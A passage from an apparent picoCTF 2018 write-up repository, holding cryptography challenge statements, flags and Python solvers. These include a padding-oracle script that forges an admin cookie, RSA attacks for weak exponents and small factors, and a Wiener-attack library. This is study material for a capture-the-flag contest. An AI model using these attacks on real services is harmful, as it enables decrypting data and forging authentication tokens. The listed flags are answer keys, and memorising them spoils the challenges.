binary combinations of 1 byte\nbyte_combinations = []\nfor i in range(0, 256):\n i = hex(i)[2:]\n byte_combinations.append('0' + i if len(i) == 1 else i)\n\n# Add zeros to the front of hex string.\ndef add_zeros(string, desired_length):\n while len(string) < desired_length:\n string = '0' + string\n return string\n\n# Uses the padding oracle to return the decrypted hex string of the input cipherblock\ndef decrypt_ciphertext(cipherblock):\n # Queries the server and submits the ciphertext\n # If invalid padding, return False. Else True (might be buggy if input is wrongly formatted)\n def check_pad(s: str) -> bool:\n print(s[:32]) # Print the IV\n nc = nclib.Netcat(connect = ('2018shell1.picoctf.com', 27533), verbose = False)\n nc.settimeout(2)\n\n # Receive the first 2 messages given by the server\n nc.recv()\n nc.recv()\n\n # Send the cipherblocks with new line char behind to signify the end of the input\n nc.send(s.encode() + b'\\n')\n\n # Receive data\n data = nc.recv(100000)\n if b'invalid padding' in data:\n return False\n else:\n print(data) # Make sure data is error about JSON string\n return True\n \n decrypted_cipherblock = ''\n for i in range(1, 17): # Block length is 128 bits = 16 bytes\n # Try all combination of bits\n for byte in byte_combinations:\n found = False\n\n iv_prime = '0' * (32 - i * 2) + byte\n if i != 1: # Account for the padding for 2nd byte onwards\n # Get the values required to achieve the back padding by XOR-ing the pad with the known D(C)\n pad = (byte_combinations[i] * (i - 1))\n padding_for_iv = hex(int(pad, base=16) ^ int(decrypted_cipherblock, base=16))[2:]\n padding_for_iv = add_zeros(padding_for_iv, len(pad))\n iv_prime += padding_for_iv\n\n # Send to padding oracle\n res = check_pad(iv_prime + cipherblock)\n if res == True: # Correct padding obtained, calculate D(C)'s byte\n val = int(byte_combinations[i], base=16) ^ int(byte, base=16)\n val = hex(val)[2:]\n decrypted_cipherblock = '0' + val + decrypted_cipherblock if len(val) == 1 else val + decrypted_cipherblock\n found = True\n break\n\n # If all 256 bytes have been exhausted without a valid padding, then something went wrong.\n if found == False:\n print('Error - couldn\\'t find proper padding.')\n return\n return decrypted_cipherblock\n\n# Encrypts a given plaintext by using the padding oracle attack as a decryption oracle.\ndef encrypt_plaintext(plaintext):\n # Splits input string into blocks of 16 bytes and pads the last block according to PKCS #7\n def split_input_string(input_string):\n BLOCK_LENGTH = 16 # 16 bytes\n splitted_input_string = []\n\n # Split into blocks of 16 bytes\n for _ in range(len(input_string) // BLOCK_LENGTH):\n splitted_input_string.append(input_string[:BLOCK_LENGTH])\n input_string = input_string[BLOCK_LENGTH:]\n \n # Pad the last block\n padding_required = BLOCK_LENGTH - len(input_string)\n padding_required = '0' + hex(padding_required)[2:] if len(hex(padding_required)[2:]) == 1 else hex(padding_required)[2:]\n while len(input_string) < BLOCK_LENGTH:\n input_string += binascii.unhexlify(padding_required.encode())\n \n # Append to output array of blocks of 16 bytes and return\n splitted_input_string.append(input_string)\n return splitted_input_string\n \n # Get 16 byte blocks of the plaintext\n plaintext = split_input_string(plaintext.encode())\n arbitrary_ciphertext_block = 'cafebabecafebabecafebabecafebabe'\n\n # Ciphertext should end with this arbitrary block\n ciphertext = [arbitrary_ciphertext_block]\n\n # Get blocks from the back of the plaintext\n current_cipher_block = arbitrary_ciphertext_block\n for block in plaintext[::-1]:\n # Get D(C_n)\n current_decrypted_block = decrypt_ciphertext(current_cipher_block)\n\n # Get C_n-1 by XOR-ing with plaintext block\n previous_cipher_block = int.from_bytes(block, byteorder='big') ^ int(current_decrypted_block, base=16)\n previous_cipher_block = hex(previous_cipher_block)[2:]\n previous_cipher_block = add_zeros(previous_cipher_block, 32)\n\n ciphertext.append(previous_cipher_block) # Append to ciphertext\n current_cipher_block = previous_cipher_block # Make prev cipherblock current cipherblock\n\n return ciphertext\n\nplaintext = '{\"username\": \"cafebabe!\",\"is_admin\": \"true\",\"expires\": \"2020-1-1\"}'\nciphertext = encrypt_plaintext(plaintext)\n\n# Print out ciphertext\nfor block in ciphertext[::-1]:\n print(block, end=' ')\n" }, { "path": "Cryptography/Safe RSA/README.md", "content": "# Safe RSA\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>Now that you know about RSA can you help us decrypt this [ciphertext](files/ciphertext)? We don't have the decryption key but something about those values looks funky.. \n\n### Hint\n>RSA [tutorial](https://en.wikipedia.org/wiki/RSA_(cryptosystem))\n>\n>Hmmm that e value looks kinda small right?\n>\n>These are some really big numbers.. Make sure you're using functions that don't lose any precision!\n\n## Solution\nSince _n_ is really huge and _e_ is really tiny, we can figure out the message without needing to factorise _n_!\n\nWe can assume that `m ** e < n`. Therefore we do a cube root on _c_, and convert the value into ascii.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{e_w4y_t00_sm411_81b6559f}`\n" }, { "path": "Cryptography/Safe RSA/files/ciphertext", "content": "\nN: 374159235470172130988938196520880526947952521620932362050308663243595788308583992120881359365258949723819911758198013202644666489247987314025169670926273213367237020188587742716017314320191350666762541039238241984934473188656610615918474673963331992408750047451253205158436452814354564283003696666945950908549197175404580533132142111356931324330631843602412540295482841975783884766801266552337129105407869020730226041538750535628619717708838029286366761470986056335230171148734027536820544543251801093230809186222940806718221638845816521738601843083746103374974120575519418797642878012234163709518203946599836959811\ne: 3\n\nciphertext (c): 2205316413931134031046440767620541984801091216351222789180582564557328762455422721368029531360076729972211412236072921577317264715424950823091382203435489460522094689149595951010342662368347987862878338851038892082799389023900415351164773 \n" }, { "path": "Cryptography/Safe RSA/solution/solve.py", "content": "#!/usr/bin/python\n\nfrom gmpy2 import *\n\nget_context().precision=500\n\nc = mpq(2205316413931134031046440767620541984801091216351222789180582564557328762455422721368029531360076729972211412236072921577317264715424950823091382203435489460522094689149595951010342662368347987862878338851038892082799389023900415351164773, 1)\n\nprint str(hex(int(cbrt(c))))[2:-1].decode('hex')" }, { "path": "Cryptography/SpyFi/README.md", "content": "# SpyFi\nPoints: 300\n\n## Category\nCryptography\n\n## Question\n>James Brahm, James Bond's less-franchised cousin, has left his secure communication with HQ running, but we couldn't find a way to steal his agent identification code. Can you? Conect with `nc 2018shell1.picoctf.com 30399`. [Source](files/spy_terminal_no_flag.py). \n\n### Hint\n>What mode is being used?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Cryptography/SpyFi/files/spy_terminal_no_flag.py", "content": "#!/usr/bin/python2 -u\nfrom Crypto.Cipher import AES\n\nagent_code = \"\"\"flag\"\"\"\n\ndef pad(message):\n if len(message) % 16 != 0:\n message = message + '0'*(16 - len(message)%16 )\n return message\n\ndef encrypt(key, plain):\n cipher = AES.new( key.decode('hex'), AES.MODE_ECB )\n return cipher.encrypt(plain).encode('hex')\n\nwelcome = \"Welcome, Agent 006!\"\nprint welcome\n\nsitrep = raw_input(\"Please enter your situation report: \")\nmessage = \"\"\"Agent,\nGreetings. My situation report is as follows:\n{0}\nMy agent identifying code is: {1}.\nDown with the Soviets,\n006\n\"\"\".format( sitrep, agent_code )\n\nmessage = pad(message)\nprint encrypt( \"\"\"key\"\"\", message )\n" }, { "path": "Cryptography/Super Safe RSA/README.md", "content": "# Super Safe RSA\nPoints: 350\n\n## Category\nCryptography\n\n## Question\n>Dr. Xernon made the mistake of rolling his own crypto.. Can you find the bug and decrypt the message? Connect with `nc 2018shell1.picoctf.com 6262`. \n\n### Hint\n>Just try the first thing that comes to mind.\n\n## Solution\nThe first thing that comes to mind is to factorise _n_, to get the totient, and generate the private key. We use [msieve](https://sourceforge.net/projects/msieve/) as our factorising tool.\n\nJust factorise the primes, and get _p_ and _q_. A Python script is needed to decrypt the ciphertext and get the flag\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{us3_l@rg3r_pr1m3$_2711}`\n" }, { "path": "Cryptography/Super Safe RSA/solution/ciphertext", "content": "c: 7929011382767041584510203527859505899601572024468762886720475415218105799874362\nn: 11930191517420424428458862771846268087893161863249464023139623203854660066472157\ne: 65537\n" }, { "path": "Cryptography/Super Safe RSA/solution/solve.py", "content": "#!/usr/bin/python\nfrom gmpy2 import *\n\nc = 7929011382767041584510203527859505899601572024468762886720475415218105799874362\nn = 11930191517420424428458862771846268087893161863249464023139623203854660066472157\ne = 65537\n\np = 92027970011808537690210426025129587299\nq = 129636582398694722475936463924386691191743\n\ndef eea(a,b):\n\tif b==0:return (1,0)\n\t(q,r) = (a//b,a%b)\n\t(s,t) = eea(b,r)\n\treturn (t, s-(q*t) )\n\ndef find_inverse(x,y):\n\tinv = eea(x,y)[0]\n\tif inv < 1: inv += y #we only want positive values\n\treturn inv\n\ntotient = (p - 1) * (q - 1)\n\nd = find_inverse(e, totient)\nflag = powmod(c, d, n)\n\nprint hex(flag)[2:].decode('hex')\n" }, { "path": "Cryptography/Super Safe RSA 2/README.md", "content": "# Super Safe RSA 2\nPoints: 425\n\n## Category\nCryptography\n\n## Question\n>Wow, he made the exponent really large so the encryption MUST be safe, right?! Connect with `nc 2018shell1.picoctf.com 56543`. \n\n### Hint\n>What is the usual value for e?\n\n## Solution\nWorking solution [solve.py](solution/solve.py).\n\n### Flag\n`picoCTF{w@tch_y0ur_Xp0n3nt$_c@r3fu11y_2104643}`\n" }, { "path": "Cryptography/Super Safe RSA 2/solution/ciphertext", "content": "c: 87973714357981711192552122844931994201928929629523523402698449229349318496325838631069992408358538609456707487292932430988908376333690020467856573339571710564864261213347859858094994302558444565941871798549199610810852463994468365272979667205962334739912686073389255122096601393196371860158722056997802747144\nn: 123011419727242929605859484379712787224119427868122185028414426038747211967728126687082223191959583800124030930442533997557997625495312608148837196827665382944411142837816321635710707548473070155845149369804586838545770200114861944189730393681376431146673015470955622822572616394605670811484761576817673309001\ne: 20370827750732677953101194500404700852089173301382884082478321647291201786559551992537091540692087873762090234342322985115231826746732803397154738501467143140654322623572067396058860233911575260540468106570172920030157403146163826401598627492164762337650828047117823273414399019740348998847585859920303350373\n" }, { "path": "Cryptography/Super Safe RSA 2/solution/solve.py", "content": "#!/usr/bin/python\nfrom gmpy2 import *\nfrom wienerAttack.RSAwienerHacker import *\n\nN = 123011419727242929605859484379712787224119427868122185028414426038747211967728126687082223191959583800124030930442533997557997625495312608148837196827665382944411142837816321635710707548473070155845149369804586838545770200114861944189730393681376431146673015470955622822572616394605670811484761576817673309001\n\nC = 87973714357981711192552122844931994201928929629523523402698449229349318496325838631069992408358538609456707487292932430988908376333690020467856573339571710564864261213347859858094994302558444565941871798549199610810852463994468365272979667205962334739912686073389255122096601393196371860158722056997802747144\n\nE = 20370827750732677953101194500404700852089173301382884082478321647291201786559551992537091540692087873762090234342322985115231826746732803397154738501467143140654322623572067396058860233911575260540468106570172920030157403146163826401598627492164762337650828047117823273414399019740348998847585859920303350373\n\nd = hack_RSA(E, N)\n\nprint hex(powmod(C, d, N))[2:].decode('hex')" }, { "path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/Arithmetic.py", "content": "'''\nCreated on Dec 22, 2011\n\n@author: pablocelayes\n'''\n\ndef egcd(a,b):\n '''\n Extended Euclidean Algorithm\n returns x, y, gcd(a,b) such that ax + by = gcd(a,b)\n '''\n u, u1 = 1, 0\n v, v1 = 0, 1\n while b:\n q = a // b\n u, u1 = u1, u - q * u1\n v, v1 = v1, v - q * v1\n a, b = b, a - q * b\n return u, v, a\n\ndef gcd(a,b):\n '''\n 2.8 times faster than egcd(a,b)[2]\n '''\n a,b=(b,a) if a= 0\n n = 0\n while x > 0:\n n = n+1\n x = x>>1\n return n\n\n\ndef isqrt(n):\n '''\n Calculates the integer square root\n for arbitrary large nonnegative integers\n '''\n if n < 0:\n raise ValueError('square root not defined for negative numbers')\n \n if n == 0:\n return 0\n a, b = divmod(bitlength(n), 2)\n x = 2**(a+b)\n while True:\n y = (x + n//x)//2\n if y >= x:\n return x\n x = y\n\n\ndef is_perfect_square(n):\n '''\n If n is a perfect square it returns sqrt(n),\n \n otherwise returns -1\n '''\n h = n & 0xF; #last hexadecimal \"digit\"\n \n if h > 9:\n return -1 # return immediately in 6 cases out of 16.\n\n # Take advantage of Boolean short-circuit evaluation\n if ( h != 2 and h != 3 and h != 5 and h != 6 and h != 7 and h != 8 ):\n # take square root if you must\n t = isqrt(n)\n if t*t == n:\n return t\n else:\n return -1\n \n return -1\n\n#TEST functions\n\ndef test_is_perfect_square():\n print(\"Testing is_perfect_square\")\n testsuit = [4, 0, 15, 25, 18, 901, 1000, 1024]\n \n for n in testsuit:\n print(\"Is \", n, \" a perfect square?\")\n if is_perfect_square(n)!= -1:\n print(\"Yes!\")\n else:\n print(\"Nope\")\n\nif __name__ == \"__main__\":\n test_is_perfect_square()" }, { "path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/ContinuedFractions.py", "content": "'''\nCreated on Dec 14, 2011\n\n@author: pablocelayes\n \n'''\n\ndef rational_to_contfrac (x, y):\n ''' \n Converts a rational x/y fraction into\n a list of partial quotients [a0, ..., an] \n '''\n a = x//y\n if a * y == x:\n return [a]\n else:\n pquotients = rational_to_contfrac(y, x - a * y)\n pquotients.insert(0, a)\n return pquotients\n\n#TODO: efficient method that calculates convergents on-the-go, without doing partial quotients first \ndef convergents_from_contfrac(frac): \n '''\n computes the list of convergents\n using the list of partial quotients \n '''\n convs = [];\n for i in range(len(frac)):\n convs.append(contfrac_to_rational(frac[0:i]))\n return convs\n\ndef contfrac_to_rational (frac):\n '''Converts a finite continued fraction [a0, ..., an]\n to an x/y rational.\n '''\n if len(frac) == 0:\n return (0,1)\n elif len(frac) == 1:\n return (frac[0], 1)\n else:\n remainder = frac[1:len(frac)]\n (num, denom) = contfrac_to_rational(remainder)\n # fraction is now frac[0] + 1/(num/denom), which is \n # frac[0] + denom/num.\n return (frac[0] * num + denom, num)\n\ndef test1():\n '''\n Verify that the basic continued-fraction manipulation stuff works.\n '''\n testnums = [(1, 1), (1, 2), (5, 15), (27, 73), (73, 27)]\n for r in testnums:\n (num, denom) = r\n print('rational number:')\n print(r)\n \n contfrac = rational_to_contfrac (num, denom)\n print('continued fraction:')\n print(contfrac)\n \n print('convergents:')\n print(convergents_from_contfrac(contfrac))\n print('***********************************')\n \nif __name__ == \"__main__\":\n test1()" }, { "path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/RSAwienerHacker.py", "content": "'''\nCreated on Dec 14, 2011\n\n@author: pablocelayes\n'''\n\nimport ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator\n\ndef hack_RSA(e,n):\n '''\n Finds d knowing (e,n)\n applying the Wiener continued fraction attack\n '''\n frac = ContinuedFractions.rational_to_contfrac(e, n)\n convergents = ContinuedFractions.convergents_from_contfrac(frac)\n \n for (k,d) in convergents:\n \n #check if d is actually the key\n if k!=0 and (e*d-1)%k == 0:\n phi = (e*d-1)//k\n s = n - phi + 1\n # check if the equation x^2 - s*x + n = 0\n # has integer roots\n discr = s*s - 4*n\n if(discr>=0):\n t = Arithmetic.is_perfect_square(discr)\n if t!=-1 and (s+t)%2==0:\n print(\"Hacked!\")\n return d\n\n# TEST functions\n\ndef test_hack_RSA():\n print(\"Testing Wiener Attack\")\n times = 5\n \n while(times>0):\n e,n,d = RSAvulnerableKeyGenerator.generateKeys(1024)\n print(\"(e,n) is (\", e, \", \", n, \")\")\n print(\"d = \", d)\n \n hacked_d = hack_RSA(e, n)\n \n if d == hacked_d:\n print(\"Hack WORKED!\")\n else:\n print(\"Hack FAILED\")\n \n print(\"d = \", d, \", hacked_d = \", hacked_d)\n print(\"-------------------------\")\n times -= 1\n \nif __name__ == \"__main__\":\n #test_is_perfect_square()\n #print(\"-------------------------\")\n test_hack_RSA()\n\n\n \n\n\n \n \n" }, { "path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/__init__.py", "content": "" }, { "path": "Cryptography/Super Safe RSA 3/README.md", "content": "# Super Safe RSA 3 \nPoints: 600\n\n## Category\nCryptography\n\n## Question\n>The more primes, the safer.. right.?.? Connect with `nc 2018shell1.picoctf.com 11423`. \n\n### Hint\n>How would you find d if there are more than 2 prime factors of n?\n\n## Solution\nUse msieve to install to factorise the primes\n\nCalculate the totient by doing `(prime_1 - 1) * (prime_2 - 1) ... (prime_n - 1)` where `n` is the total number of primes\n\nReconstruct the private key, and decrypt the message\n\nRecommended reads: https://crypto.stackexchange.com/questions/44110/rsa-with-3-primes\n\n### Flag\n`picoCTF{p_&_q_n0_r_$_t!!_6629910}`\n" }, { "path": "Cryptography/Super Safe RSA 3/solution/ciphertext", "content": "c: 38267717521783805358997028434192574072066206734150058806702039241540545591327160817138103308778806260550691278229033409184518095836671759886018797380100194106653804590171378094033599430892604979401307896519429546854583917860199582081050782350831478073093769585362279610973195866544327315887867433642490547\nn: 40795360971651974271650711440993964050307855147720011233981545415438122680764985969049700071051749071781096004576107493076004911609956646026586641164708122628888234552831947705825820830717771374968853614494573673171451401812260688186915972782495102601063537646203830376891448685264916094254020958827455069\ne: 65537\n" }, { "path": "Cryptography/Super Safe RSA 3/solution/solve.py", "content": "#!/usr/bin/python\nfrom gmpy2 import *\n\nn = 40795360971651974271650711440993964050307855147720011233981545415438122680764985969049700071051749071781096004576107493076004911609956646026586641164708122628888234552831947705825820830717771374968853614494573673171451401812260688186915972782495102601063537646203830376891448685264916094254020958827455069\n\nc = 38267717521783805358997028434192574072066206734150058806702039241540545591327160817138103308778806260550691278229033409184518095836671759886018797380100194106653804590171378094033599430892604979401307896519429546854583917860199582081050782350831478073093769585362279610973195866544327315887867433642490547\n\ne = 65537\n\nprimes = [\n\t2408536589,\n\t2613433873,\n\t2646493621,\n\t2666585221,\n\t2670389531,\n\t2683499473,\n\t2685364093,\n\t2741484497,\n\t2863351783,\n\t2886722177,\n\t2925436511,\n\t3064431973,\n\t3108375629,\n\t3148348271,\n\t3266962103,\n\t3274199927,\n\t3340290809,\n\t3347444599,\n\t3358514681,\n\t3521655793,\n\t3548118169,\n\t3874420523,\n\t3896780983,\n\t3957297011,\n\t3993894323,\n\t4051778999,\n\t4079155009,\n\t4079785417,\n\t4111436137,\n\t4137823787,\n\t4173914051,\n\t4186089221\n]\n\ntotient = 1\n\nfor i in primes:\n\ttotient *= (i - 1)\n\nassert gcd(e, totient) == 1\n\nd = invert(e, totient)\n\nget_context().precision=1000\n\nm = powmod(c, d, n)\n\nprint str(hex(int(m)))[2:-1].decode('hex')\n" }, { "path": "Cryptography/blaise's cipher/README.md", "content": "# blaise's cipher\nPoints: 200\n\n## Category\nCryptography\n\n## Question\n>My buddy Blaise told me he learned about this cool cipher invented by a guy also named Blaise! Can you figure out what it says? Connect with `nc 2018shell1.picoctf.com 46966`. \n\n### Hint\n>There are tools that make this easy.\n>\n>This cipher was NOT invented by Pascal\n\n## Solution\nThis is a Vigenère Cipher, this time without a key. Bruteforce using an online tool. Online tool: https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx\n\n### Flag\n`picoCTF{v1gn3r3_c1ph3rs_ar3n7_bad_cdf08bf0}`\n" }, { "path": "Cryptography/blaise's cipher/solution/ciphertext", "content": "Encrypted message:\nYse lncsz bplr-izcarpnzjo dkxnroueius zf g uzlefwpnfmeznn cousex bls ltcmaqltki my Rjzn Hfetoxea Gqmexyt axtfnj 1467 fyd axpd g rptgq nivmpr jndc zt dwoynh hjewkjy cousex fwpnfmezx. Llhjcto'x dyyypm uswy ybttimpd gqahggpty fqtkw debjcar bzrjx, lnj xhizhsey bprk nydohltki my cwttosr tnj wezypr uk ehk hzrxjdpusoitl llvmlbky tn zmp cousexypxz. Qltkw, tn 1508, Ptsatsps Zwttnjxiax, tn nnd wuwv Puqtgxfahof, tnbjytki ehk ylbaql rkhea, g hciznnar hzmvtyety zf zmp Volpnkwp cousex. Yse Zwttnjxiax nivmpr, nthebjc, otqj pxtgijjo a vwzgxjdsoap, roltd, gso pxjoiiylbrj dyyypm ltc scnecnnyg hjewkjy cousex fwpnfmezx.\n\nHhgy ts tth ktthn gx ehk Atgksprk htpnjc wgx zroltngqwy jjdcxnmej gj Gotgat Gltzndtg Gplrfdo os siy 1553 gzoq Ql cokca jjw. Sol. Riualn Hfetoxea Hjwlgxz. Hk gfiry fpus ehk ylbaql rkhea uk Eroysesnfs, hze ajipd g wppkfeitl \"noaseexxtgt\" (f vee) yz scnecn htpnjc arusahjes kapre qptzjc. Wnjcegx Llhjcto fyd Zwttnjxiax fski l focpd vfetkwy ol xfbyyttaytotx, Merqlsu'x dcnjxe sjlnz yse vfetkwy ol xfbyyttaytotx noaqo bk jlsoqj cnfygki disuwy hd derjntosr a tjh kkd. Veex hexj eyvnnarqj sosrlk bzrjx zr ymzrz usrgxps, qszwt yz buys pgweikx tn gigathp, ox ycatxxizypd \"uze ol glnj\" fwotl hizm ehk rpsyfre. Hjwlgxz's sjehui ehax cewztrki dtxtyg yjnuxney ltc otqj tnj vee. Fd iz nd rkqltoaple jlse yz skhfrk f dhuwe kkd ahxfde, yfj be f arkatoax aroaltk hznbjcsgytot, Gplrfdo'y xjszjx wgx notxtdkwlbrd xoxj deizce.\n\nHqliyj oe Bnretjce vzmloxsej mts jjdcxnatoty ol f disnwax gft yycotlpr gzeoqjj cousex gpfuwp tnj noawe ol Mpnxd TIO tq Fxfyck, ny 1586. Lgypr, os ehk 19ys ckseuxd, ehk nyvkseius zf Hjwlgxz's inahkw hay rtsgyerogftki eo Bnretjce. Jfgij Plht ny hox moup Ehk Hzdkgcegppry qlmkseej yse sndazycihzeius my yfjitl ehgy siyyzre mld \"olyoxjo tnnd isuzrzfyt itytxnmuznzn gso itxeegi yasjo a xjrrkxdibj lnj jwesjytgwj cousex kzr nnx [Volpnkwp] tntfgn mp hgi yozmtnm yz du bttn ne\". pohzCZK{g1gt3w3_n1pn3wd_ax3s7_maj_hof08hk0}\n\nEhk Atgksprk htpnjc ggnyej f cevzeaznzn ltc bknyg kcnevytotfwle xerusr. Nuypd gzehuw lnj rltnjxaznnigs Nhgwwey Qftcnogk Izdmxzn (Rjhiy Hlrxtwl) ifwlki ehk Atgksprk htpnjc utgcegplbrj tn nnd 1868 pojne \"Zmp Arusahje Cousex\" ny a imtljwpn'y rlggetnk. Ny 1917, Sinpnznqii Fxexnnat ipsiwtbki ehk Atgksprk htpnjc ay \"nxpuxdihqp ol ycatxwaznzn\". Zmts xjauzfeius hay szt jjdexapd. Imlrrjd Bggmamj ts qszwt yz hgap bxtvet f gaxnlnz tq tnj nivmpr gx paxqj ay 1854; mzwkapr, nj oijs'e pagwiym siy bzrq. Plsoxvi kseixjwy hwzkk yse inahkw lnj ufbrndhki ehk ypcnstqaj tn zmp 19tn hpnzzcy. Kapn hjqoxj ehox, ehuzrh, ytxe yptlrjo cxdatgsllexes itflj tncgxtotfwle gcegp ehk htpnjc it yse 16zm netyfre.\n\nHcyvyzgxfahoh dloip raqp uyjo ay f narhflgytot ftd hd ehk Xhiyx Lrsd mezbpet 1914 fyd 1940.\nZmp Volpnkwp cousex nd soralk jyoals tu gp a lnplj htpnjc il ne iy zdej ny cusuutheius hizm nivmpr jndky. Yse Ityfkiprgyp Szfeey tq Asjciif, qox jiasuwe, axpd g gcayx nivmpr jndk zt tmvqpmkse tnj Gimjyexj nivmpr jzcitl ehk Fxexnnat Htvoq Hax. Yse Ityfkiprghj's sjdsglps cjce lfc fxtx skhcez fyd zmp Utnzn xjrurfcle hcaippd zmpix rpsyfrey. Ysruzrhuze tnj hax, yse Ityfkiprgyp lkfoexxsiv ucisfcird cernpd auzn zmcek ppy vmcayjd, \"Mgsnhkxeex Gwulk\", \"Nosuwezj Giiyzre\" fyd, gx ehk blr ifxe zt l crtde, \"Itxe Xjerogftoty\".\n\nGoqmexy Gexslm zwtej yz rkulix yse hwzkks nivmpr (iwpaznyg zmp Vkwyas–Atgksprk htpnjc it 1918), gft, tt xazypr cmlt nj oij, yse inahkw hay xeirq gursprggwe zt nreueatfwyynd. Vkwyas'x hoxp, socjgex, jgetyfarqj lki eo zmp otj-eisj aaj, f ehktceznnarqj utgcegplbrj nivmpr.\n\n" }, { "path": "Cryptography/caesar cipher 1/README.md", "content": "# caesar cipher 1\nPoints: 150\n\n## Category\nCryptography\n\n## Question\n>This is one of the older ciphers in the books, can you decrypt the [message](files/ciphertext)? You can find the ciphertext in /problems/caesar-cipher-1_4_e4dc6dcfb004bdade0b9ce8e44f1bac4 on the shell server. \n\n### Hint\n>caesar cipher [tutorial](https://learncryptography.com/classical-encryption/caesar-cipher)\n\n## Solution\nThis is a simple caesar cipher. Online tool: https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript\n\n### Flag\n`picoCTF{justagoodoldcaesarciphertobrvmri}`\n" }, { "path": "Cryptography/caesar cipher 1/files/ciphertext", "content": "picoCTF{domnuaiixifxwuymulwcjbylnivlpglc}" }, { "path": "Cryptography/caesar cipher 2/README.md", "content": "# caesar cipher 2\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>Can you help us decrypt this [message](files/)? We believe it is a form of a caesar cipher. You can find the ciphertext in /problems/caesar-cipher-2_3_4a1aa2a4d0f79a1f8e9a29319250740a on the shell server. \n\n### Hint\n>You'll have figure out the correct alphabet that was used to encrypt the ciphertext from the ascii character set\n>\n>[ASCII Table](https://www.asciitable.com/)\n\n## Solution\nTo do\n\n### Flag\n`picoCTF{cAesaR_CiPhErS_juST_aREnT_sEcUrE}`\n" }, { "path": "Cryptography/caesar cipher 2/files/ciphertext", "content": "4-'3evh?'c)7%t#e-r,g6u#.9uv#%tg2v#7g'w6gA" }, { "path": "Cryptography/hertz/README.md", "content": "# hertz\nPoints: 150\n\n## Category\nCryptography\n\n## Question\n>Here's another simple cipher for you where we made a bunch of substitutions. Can you decrypt it? Connect with `nc 2018shell1.picoctf.com 18581`. \n\n### Hint\n>NOTE: Flag is not in the usual flag format\n\n## Solution\nThis is a Substitution Cipher. Use an online tool to brute-force. Online tool: https://quipqiup.com/\n\n### Flag\n`substitution_ciphers_are_solvable_fgnvvgndms`\n" }, { "path": "Cryptography/hertz/solution/ciphertext", "content": "-------------------------------------------------------------------------------\nuqblrjwm zxrx gm fqvr pojl - mvtmwgwvwgqb_ugyzxrm_jrx_mqokjtox_plbkklbscm\n-------------------------------------------------------------------------------\nujoo cx gmzcjxo. mqcx fxjrm jlq-bxkxr cgbs zqd oqbl yrxugmxof-zjkgbl ogwwox qr bq cqbxf gb cf yvrmx, jbs bqwzgbl yjrwguvojr wq gbwxrxmw cx qb mzqrx, g wzqvlzw g dqvos mjgo jtqvw j ogwwox jbs mxx wzx djwxrf yjrw qp wzx dqros. gw gm j djf g zjkx qp srgkgbl qpp wzx myoxxb jbs rxlvojwgbl wzx ugruvojwgqb. dzxbxkxr g pgbs cfmxop lrqdgbl lrgc jtqvw wzx cqvwz; dzxbxkxr gw gm j sjcy, srgaaof bqkxctxr gb cf mqvo; dzxbxkxr g pgbs cfmxop gbkqovbwjrgof yjvmgbl txpqrx uqppgb djrxzqvmxm, jbs trgblgbl vy wzx rxjr qp xkxrf pvbxrjo g cxxw; jbs xmyxugjoof dzxbxkxr cf zfyqm lxw mvuz jb vyyxr zjbs qp cx, wzjw gw rxhvgrxm j mwrqbl cqrjo yrgbugyox wq yrxkxbw cx prqc sxogtxrjwxof mwxyygbl gbwq wzx mwrxxw, jbs cxwzqsgujoof ebquegbl yxqyox'm zjwm qpp-wzxb, g juuqvbw gw zglz wgcx wq lxw wq mxj jm mqqb jm g ujb. wzgm gm cf mvtmwgwvwx pqr ygmwqo jbs tjoo. dgwz j yzgoqmqyzgujo poqvrgmz ujwq wzrqdm zgcmxop vyqb zgm mdqrs; g hvgxwof wjex wq wzx mzgy. wzxrx gm bqwzgbl mvryrgmgbl gb wzgm. gp wzxf tvw ebxd gw, jocqmw joo cxb gb wzxgr sxlrxx, mqcx wgcx qr qwzxr, uzxrgmz kxrf bxjrof wzx mjcx pxxogblm wqdjrsm wzx quxjb dgwz cx.\n\nwzxrx bqd gm fqvr gbmvojr ugwf qp wzx cjbzjwwqxm, txowxs rqvbs tf dzjrkxm jm gbsgjb gmoxm tf uqrjo rxxpm-uqccxrux mvrrqvbsm gw dgwz zxr mvrp. rglzw jbs oxpw, wzx mwrxxwm wjex fqv djwxrdjrs. gwm xiwrxcx sqdbwqdb gm wzx tjwwxrf, dzxrx wzjw bqtox cqox gm djmzxs tf djkxm, jbs uqqoxs tf trxxaxm, dzguz j pxd zqvrm yrxkgqvm dxrx qvw qp mglzw qp ojbs. oqqe jw wzx urqdsm qp djwxr-ljaxrm wzxrx.\n\nugruvcjctvojwx wzx ugwf qp j srxjcf mjttjwz jpwxrbqqb. lq prqc uqroxjrm zqqe wq uqxbwgxm mogy, jbs prqc wzxbux, tf dzgwxzjoo, bqrwzdjrs. dzjw sq fqv mxx?-yqmwxs ogex mgoxbw mxbwgbxom joo jrqvbs wzx wqdb, mwjbs wzqvmjbsm vyqb wzqvmjbsm qp cqrwjo cxb pgixs gb quxjb rxkxrgxm. mqcx oxjbgbl jljgbmw wzx mygoxm; mqcx mxjwxs vyqb wzx ygxr-zxjsm; mqcx oqqegbl qkxr wzx tvodjrem qp mzgym prqc uzgbj; mqcx zglz joqpw gb wzx rgllgbl, jm gp mwrgkgbl wq lxw j mwgoo txwwxr mxjdjrs yxxy. tvw wzxmx jrx joo ojbsmcxb; qp dxxe sjfm yxbw vy gb ojwz jbs yojmwxr-wgxs wq uqvbwxrm, bjgoxs wq txbuzxm, uogbuzxs wq sxmem. zqd wzxb gm wzgm? jrx wzx lrxxb pgxosm lqbx? dzjw sq wzxf zxrx?\n\ntvw oqqe! zxrx uqcx cqrx urqdsm, yjugbl mwrjglzw pqr wzx djwxr, jbs mxxcgblof tqvbs pqr j sgkx. mwrjblx! bqwzgbl dgoo uqbwxbw wzxc tvw wzx xiwrxcxmw ogcgw qp wzx ojbs; oqgwxrgbl vbsxr wzx mzjsf oxx qp fqbsxr djrxzqvmxm dgoo bqw mvppgux. bq. wzxf cvmw lxw nvmw 